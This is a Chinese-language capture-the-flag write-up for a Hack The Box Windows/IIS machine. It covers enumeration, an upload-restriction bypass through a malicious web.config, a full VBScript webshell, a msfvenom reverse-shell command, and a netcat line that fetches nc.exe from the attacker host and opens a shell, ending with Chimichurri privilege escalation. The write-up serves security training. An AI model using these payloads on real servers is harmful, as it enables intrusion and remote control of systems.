概述 (Overview)
- MACHINE TAGS
- Windows
- VBScript
- C
- Web
- Patch Management
攻击链 (Kiillchain)
TTPs (Tactics, Techniques & Procedures)
- nmap
- gobuster
- VBScript
- Chimichurri
阶段1:枚举
起手还是Nmap,但扫下来就开了一个80端口:
PORT STATE SERVICE
80/tcp open http
浏览器打开后在到一张图片,琢磨着这张图在哪见过,但年代太久远有点想起不来了…
用 httpie 看一下响应头,得到一些 Web服务类信息:
在发送一个 OPTIONS 类型请求,看看IIS支持哪些 http methods:
完整的methods可以参看: https://www.tutorialspoint.com/http/http_methods.htm
$ http OPTIONS 10.10.10.93
HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Content-Length: 0
Date: Sun, 18 Apr 2021 07:11:41 GMT
Public: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
阶段2:工具和利用
阶段2.1:目录枚举
支持 OPTIONS, TRACE, GET, HEAD, POST,好吧,没什么利用点,尝试用 gobuster 进行目录枚举:
/aspnet_client (Status: 301) [Size: 156] [--> http://10.10.10.93/aspnet_client/]
/uploadedfiles (Status: 301) [Size: 156] [--> http://10.10.10.93/uploadedfiles/]
但看下来并没有什么收货,加上文件后缀名继续枚举:
gobuster dir -u http://10.10.10.93/uploadedfiles -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50 -x asp,aspx
加了 -x asp,aspx 后得到 /transfer.aspx
在搜索IIS相关漏洞的时候,发现存在短名称枚举:https://github.com/lijiejie/IIS_shortname_Scanner.git
原理可见:
http://www.lijiejie.com/iis-win8-3-shortname-brute/https://www.freebuf.com/articles/web/172561.html
阶段2.2:文件上传bypass
访问后存在一个文件上传的功能,通过 burp 开启代理插查看下请求:
通过尝试发现上传任意内容都可以,剩下的就看 bypass 解析了。
部分参数是 ASP.NET __VIEWSTATE 的编码内容,github找到 decode 工具:https://github.com/defensahacker/viewstate-decoder,但解出来后并没有什么有用的信息。
然后开始找支持 APS.NET 解析的文件后缀,google到官方文档:ASP.NET Web Project File Types:https://docs.microsoft.com/en-us/previous-versions/2wawkw1c(v=vs.140)?redirectedfrom=MSDN
截取所有类型的后缀名:
.asax
.ascx
.ashx
.asmx
.aspx
.axd
.browser
.cd
.compile
.config
.cs
.jsl
.vb
.csproj
.vbproj
.vjsproj
.disco
.vsdisco
.dsdgm
.dsprototype
.dll
.licx
.webinfo
.master
.mdb
.ldb
.mdf
.msgx
.svc
.rem
.resources
.resx
.sdm
.sdmDocument
.sitemap
.skin
.sln
.soap
.asa
.asp
.cdx
.cer
.idc
.shtm
.shtml
.stm
.css
.htm
.html
通过 Intruder 模块遍历提交,最终发现.config提交length出现变化:
引用:
包含 XML 元素的配置文件(通常为 Web.config),该元素代表 ASP.NET 功能的设置。
阶段2.3:.config代码执行
google找利用方式:
https://fgsec.net/posts/Bypass-Upload-Restrictions-and-Evade-Detection/https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/(链接已失效)
根据文章内容,上传一个测试输出内容的脚本:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!--
<%
Response.write("0x584a!")
%>
-->
可以看到,注释段里已经输出了字符串,证明能够正常执行脚本代码。接着通过 msfvenom 生成反弹 payload:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.4 LPORT=9900 -f asp -o shell.asp
$ cat shell.asp >> web.config
或者上传 webshell 也可以:
<?xml version="1.0" encoding="UTF-8"?><configuration><system.webServer><handlers accessPolicy="Read, Script, Write"><add name="new_policy" path="*.config" verb="GET" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /></handlers><security><requestFiltering><fileExtensions><remove fileExtension=".config" /></fileExtensions><hiddenSegments><remove segment="web.config" /></hiddenSegments></requestFiltering></security></system.webServer><appSettings></appSettings></configuration>
<!–-
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
Dim objShell, objCmdExec
Set objShell = CreateObject("WScript.Shell")
Set objCmdExec = objshell.exec(thecommand)
getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)
%>
通过 webshell 到 nc 上线:
copy \\10.10.16.4\share\nc.exe c:\windows\temp\nc.exe
c:\windows\temp\nc.exe -e cmd 10.10.16.4 9900
通过 where 直接搜可以的到 user flag。
阶段3:权限提升
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
通过查看服务器版本信息,发现与 Hackthebox-Arctic(https://jgeek.cn/archive/id/66.html)提权一致,尝试用 Chimichurri.exe,成功反弹 system shell。
参考
- https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Basics_of_HTTP/MIME_types
- https://github.com/xMilkPowderx/OSCP/blob/master/File%20upload.md
- http://www.lijiejie.com/iis-win8-3-shortname-brute/
- https://www.freebuf.com/articles/web/172561.html
- https://docs.microsoft.com/en-us/previous-versions/2wawkw1c(v=vs.140)?redirectedfrom=MSDN
- https://jgeek.cn/archive/id/66.html
